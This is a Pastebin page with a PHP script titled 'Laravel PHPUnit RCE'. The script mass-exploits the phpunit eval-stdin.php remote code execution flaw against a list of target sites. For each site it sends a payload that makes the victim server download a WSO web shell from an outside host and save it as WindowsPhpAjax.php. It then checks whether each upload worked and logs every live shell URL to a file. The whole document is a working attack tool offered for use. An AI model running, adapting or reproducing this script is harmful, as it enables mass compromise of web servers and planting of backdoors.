ToKeiChun

Laravel PHPUnit RCE [exploit with command]

Jan 18th, 2020
1,555
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.70 KB | None | 0 0
  1. <?php
  2. // coded by ustadcage_48
  3. error_reporting(0);
  4. ## log save ##
  5. function sv($site,$ext){
  6. $fp = fopen("$ext.txt", 'a');
  7. fwrite($fp, "$site\n");
  8. fclose($fp);
  9. }
  10. ## color ##
  11. function wr($cl,$st){
  12. $cc .= "\033[" . $cl . "m";
  13. $cc .= $st . "\033[0m";
  14. return $cc;
  15. }
  16. echo wr("0;31"," ___ _ ,
  17. / (_) | | o /| / o
  18. \__ _ | | __ _|_ |__/ _|_ __,
  19. / /\/ |/ \_|/ / \_| |-----| \ | | / |
  20. \___/ /\_/|__/ |__/\__/ |_/|_/ | \_/|_/|_/\_/|_/
  21. /|
  22. \| Sharing [IT] Exploit\n\n");
  23.  
  24. //sleep(2);
  25. print wr("0;33","[+] ReUpload File\n");
  26. //sleep(2);
  27. print wr("0;33","[+] Opening Tools ...\n");
  28. //sleep(1);
  29. print wr("0;33","[+] Please Wait ...\n\n");
  30. //sleep(2);
  31. $baca = explode("\r\n",file_get_contents($argv[1]));
  32. $code = "<?php copy('http://www.snapdesigns.uk/wp-includes/theme-compat/uploader.txt', 'WindowsPhpAjax.php'); ?>";
  33. $bugnya = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php";
  34. // pecah
  35. foreach($baca as $shell){
  36. echo "[$] ".wr("0;33","$shell\n");
  37. shell_exec('curl -sk -d "'.$code.'" -X GET '.$shell.$bugnya.'');
  38. // parse
  39. $parse = parse_url($shell);
  40. $pattern = '~\w+\.php~';
  41. $parse = preg_replace($pattern, '', $parse);
  42. $url = $parse['scheme'].'://'.$parse['host'].'/vendor/phpunit/phpunit/src/Util/PHP/';
  43. echo $url."\n";
  44. if(preg_match('/GIF89a1/',file_get_contents($url."WindowsPhpAjax.php"))){
  45. echo "[$] ".wr("0;32","WSO Shell Successfully Uploaded\n");;
  46. echo "[$] ".wr("0;33","Shell")." -> ".wr("0;32",$url."WindowsPhpAjax.php\n\n");
  47. sv($url."WindowsPhpAjax.php","setor");
  48.  
  49. }
  50. else {
  51. echo "[$] ".wr("0;31","WSO Tools Not Uploaded !!\n\n");
  52. }}
Add Comment
Please, Sign In to add comment